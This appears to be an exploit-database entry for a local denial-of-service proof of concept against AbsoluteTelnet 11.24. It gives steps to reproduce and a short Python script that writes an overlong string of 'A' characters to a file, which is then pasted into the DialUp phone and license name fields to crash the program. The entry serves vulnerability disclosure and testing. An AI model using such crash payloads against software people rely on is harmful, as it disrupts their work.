
5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass
36 lines
No EOL
1.1 KiB
Python
Executable file
36 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
|
|
# Discovered by: Yehia Elghaly
|
|
# Discovered Date: 2021-11-10
|
|
# Vendor Homepage: https://www.celestialsoftware.net/
|
|
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
|
|
# Tested Version: 11.24
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
|
|
|
|
# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
|
|
|
|
# Steps to reproduce:
|
|
# 1. - Download and install AbsoluteTelnet
|
|
# 2. - Run the python script and it will create exploit.txt file.
|
|
# 3. - Open AbsoluteTelnet 11.24
|
|
# 4. - "new connection file -> DialUp Connection
|
|
# 5. - Paste the characters of txt file to "DialUp -> phone"
|
|
# 6. - press "ok" button
|
|
# 7. - Crashed
|
|
# 8. - Reopen AbsoluteTelnet 11.24
|
|
# 9. - Copy the same characters to "license name"
|
|
# 10.- Click "Send Error Report" button
|
|
# 11.- Crashed
|
|
|
|
#!/usr/bin/python
|
|
|
|
exploit = 'A' * 1000
|
|
|
|
try:
|
|
file = open("exploit.txt","w")
|
|
file.write(exploit)
|
|
file.close()
|
|
|
|
print("POC is created")
|
|
except:
|
|
print("POC not created") |